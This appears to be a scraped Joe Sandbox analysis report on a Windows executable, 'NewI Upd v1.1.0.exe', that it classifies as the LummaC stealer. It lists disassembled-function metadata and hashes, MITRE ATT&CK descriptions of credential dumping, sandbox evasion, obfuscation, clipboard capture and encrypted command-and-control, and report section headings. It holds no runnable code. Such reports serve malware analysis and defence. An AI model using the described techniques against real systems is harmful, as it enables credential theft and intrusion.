API String ID: 4219598475-1254537880
Opcode ID: 1889e61c96f66056d7d26ec9d0c39bd0860f245a9e2bd430473612d035d2d467
Instruction ID: af0ff36363d9918ed623880c698ca2f554622a7092fcb41efb430f82441b2b23
Opcode Fuzzy Hash: 1889e61c96f66056d7d26ec9d0c39bd0860f245a9e2bd430473612d035d2d467
Instruction Fuzzy Hash: 4111CE70811208EAEB04FB94C857BED73A4FF21704F904058A5059A592EBB09B84D792

Function 0087FEB0 Relevance: 6.2, APIs: 4, Instructions: 211COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMTD ref: 0087FFB3
___AdjustPointer.LIBCMTD ref: 0087FFFD
___AdjustPointer.LIBCMTD ref: 00880067
___AdjustPointer.LIBCMTD ref: 008800AF

Memory Dump Source

Source File: 00000000.00000002.3179197662.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.3179182206.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179362694.00000000008AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179382474.00000000008BF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179400184.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179416887.00000000008C3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_NewI Upd v1.jbxd

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: 2d6a2575b6fc7f255cf0689b32a77e7f43749fa533fbc3c1dc813909b6d0a2da
Instruction ID: 75f5f210c84eaf49cbd5b661e5697647231897682e99a46b2939a10709938437
Opcode Fuzzy Hash: 2d6a2575b6fc7f255cf0689b32a77e7f43749fa533fbc3c1dc813909b6d0a2da
Instruction Fuzzy Hash: E2912A74A00209CFCB04DF98D884BAEB7B1FB49308F248169E8159B395CB35EC85CFA1

Function 00897690 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 205COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(0000FDE9,?), ref: 008976C3

Strings

z, xrefs: 00897997
, xrefs: 00897794

Memory Dump Source

Source File: 00000000.00000002.3179197662.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.3179182206.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179362694.00000000008AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179382474.00000000008BF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179400184.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179416887.00000000008C3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_NewI Upd v1.jbxd

Similarity

API ID: Info
String ID: $z
API String ID: 1807457897-2251613814
Opcode ID: 00b3414fcc32920ab64507275a7014dd7339ab6c553a5b45b365e6a4baf42adc
Instruction ID: 2f8ef3d9a19feed2e7a9712930cee64f7284a0cc24f6f08bc32632421805cf75
Opcode Fuzzy Hash: 00b3414fcc32920ab64507275a7014dd7339ab6c553a5b45b365e6a4baf42adc
Instruction Fuzzy Hash: 26A13D74A5C25C9BDF15DF48C891BE9BB71FF44308F1880D9D94D9B282C278AA91CF94

Function 00896B50 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 108timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Timevec::_Timevec.LIBCPMTD ref: 00896B98

Strings

minkernel\crts\ucrt\src\appcrt\startup\argv_wildcards.cpp, xrefs: 00896B81, 00896C16

Memory Dump Source

Source File: 00000000.00000002.3179197662.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.3179182206.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179362694.00000000008AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179382474.00000000008BF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179400184.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179416887.00000000008C3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_NewI Upd v1.jbxd

Similarity

API ID: TimevecTimevec::_std::_
String ID: minkernel\crts\ucrt\src\appcrt\startup\argv_wildcards.cpp
API String ID: 4219598475-2801755846
Opcode ID: dd2cfb7d256944f1d14587b8c8285508fe5c1bd868e332a4da96da57a6f0c754
Instruction ID: 897cc15e7eccb36a74d2bd44e5ece62bf155cfad741fb8f2dda7749de0f0bd14
Opcode Fuzzy Hash: dd2cfb7d256944f1d14587b8c8285508fe5c1bd868e332a4da96da57a6f0c754
Instruction Fuzzy Hash: 3B411E74E00109EFDB14EF98C581EAEB7B1FF54304F648598E515AB391EB30AE51DB80

Function 0087EB40 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 99COMMONLIBRARYCODE

Download Yara Rule

Strings

D:\a\_work\1\s\src\vctools\crt\vcruntime\src\internal\per_thread_data.cpp, xrefs: 0087EBD9

Memory Dump Source

Source File: 00000000.00000002.3179197662.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.3179182206.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179362694.00000000008AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179382474.00000000008BF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179400184.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179416887.00000000008C3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_NewI Upd v1.jbxd

Similarity

API ID:
String ID: D:\a\_work\1\s\src\vctools\crt\vcruntime\src\internal\per_thread_data.cpp
API String ID: 0-277556848
Opcode ID: 9f932460e5eb50291b03e0c7eebdbf0b5afa75688a92038aaa5cad8a94bbf409
Instruction ID: 002a155554cee142f11171ab849e237099af01f90f1b2a9316134326ef94b90a
Opcode Fuzzy Hash: 9f932460e5eb50291b03e0c7eebdbf0b5afa75688a92038aaa5cad8a94bbf409
Instruction Fuzzy Hash: 84313674D10108DACB04EBA8DC82BEDB774FB28318F5485F4E51AE6296EB34DE05DB52

Function 0089F180 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97timeCOMMON

Download Yara Rule

APIs

std::_Timevec::_Timevec.LIBCPMTD ref: 0089F1CD
std::_Timevec::_Timevec.LIBCPMTD ref: 0089F217

Part of subcall function 0089AF30: InitializeCriticalSectionEx.KERNEL32(?,?,?,?,008988D5,-008C1A89,00000FA0,00000000), ref: 0089AF41

Strings

minkernel\crts\ucrt\src\appcrt\stdio\_file.cpp, xrefs: 0089F1B2, 0089F1FB

Memory Dump Source

Source File: 00000000.00000002.3179197662.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.3179182206.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179362694.00000000008AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179382474.00000000008BF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179400184.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179416887.00000000008C3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_NewI Upd v1.jbxd

Similarity

API ID: TimevecTimevec::_std::_$CriticalInitializeSection
String ID: minkernel\crts\ucrt\src\appcrt\stdio\_file.cpp
API String ID: 902273576-1882378938
Opcode ID: b5983d9b09c68881500fb6e852fd489df09c6120bf509f4c9eab94d6559eeeda
Instruction ID: 49bc15c4c7ecaa98de2bb1bff523f839902b7127becfec73607fa268a4526841
Opcode Fuzzy Hash: b5983d9b09c68881500fb6e852fd489df09c6120bf509f4c9eab94d6559eeeda
Instruction Fuzzy Hash: C641A475A04304ABCF28EFA8DC8AFAD7B70FB51314F184269D612E62E3D7B45A44CB45

Function 0087E570 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38COMMON

Download Yara Rule

APIs

___vcrt_getptd.LIBVCRUNTIMED ref: 0087E5BE
___vcrt_getptd.LIBVCRUNTIMED ref: 0087E5D2

Strings

csm, xrefs: 0087E589

Memory Dump Source

Source File: 00000000.00000002.3179197662.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.3179182206.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179362694.00000000008AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179382474.00000000008BF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179400184.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179416887.00000000008C3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_NewI Upd v1.jbxd

Similarity

API ID: ___vcrt_getptd
String ID: csm
API String ID: 984050374-1018135373
Opcode ID: e2b09092fee05a908b510c42ed20633341b7a21a3910ae2c3f6aff4892acc549
Instruction ID: 235fc31b89fe1d25d402292a272744c11cd1d9c551c1100e5d4e7c95c7e88187
Opcode Fuzzy Hash: e2b09092fee05a908b510c42ed20633341b7a21a3910ae2c3f6aff4892acc549
Instruction Fuzzy Hash: EA01A938900208DF8B18DF65D151869BBB6FF48315B6481D8D44A9F359E731EF41DB91

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report NewI Upd v1.1.0.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Windows Analysis Report
NewI Upd v1.1.0.exe

Function 004388C0 Relevance: 39.1, APIs: 11, Strings: 11, Instructions: 609
memorycomCOMMON

Function 0040E7AD Relevance: 15.6, APIs: 2, Strings: 8, Instructions: 640
COMMON

Function 004237C9 Relevance: 11.1, APIs: 1, Strings: 5, Instructions: 627
COMMON

Function 00423960 Relevance: 9.2, APIs: 1, Strings: 4, Instructions: 469
COMMON

Function 0042D199 Relevance: 9.2, APIs: 1, Strings: 4, Instructions: 421
COMMON

Function 00408780 Relevance: 7.8, APIs: 5, Instructions: 316
threadCOMMON

Function 0042D53A Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 367
COMMON

Function 008C06E8 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 104
nativeCOMMON

Function 00427220 Relevance: 4.0, Strings: 3, Instructions: 273
COMMON

Function 0089AA40 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 94
memoryCOMMONLIBRARYCODE

Function 0040A720 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 140
libraryCOMMON